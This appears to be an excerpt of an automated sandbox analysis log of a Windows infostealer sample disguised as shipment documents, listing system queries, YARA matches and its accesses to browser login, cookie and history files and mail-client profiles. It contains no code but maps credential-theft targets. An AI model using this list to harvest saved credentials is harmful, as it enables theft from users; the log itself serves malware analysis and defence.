Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Users\user\Desktop\rShipmentDocuments.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZOlmYtPdlO.exe PID: 8136, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\rShipmentDocuments.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ZOlmYtPdlO.exe PID: 8136, type: MEMORYSTR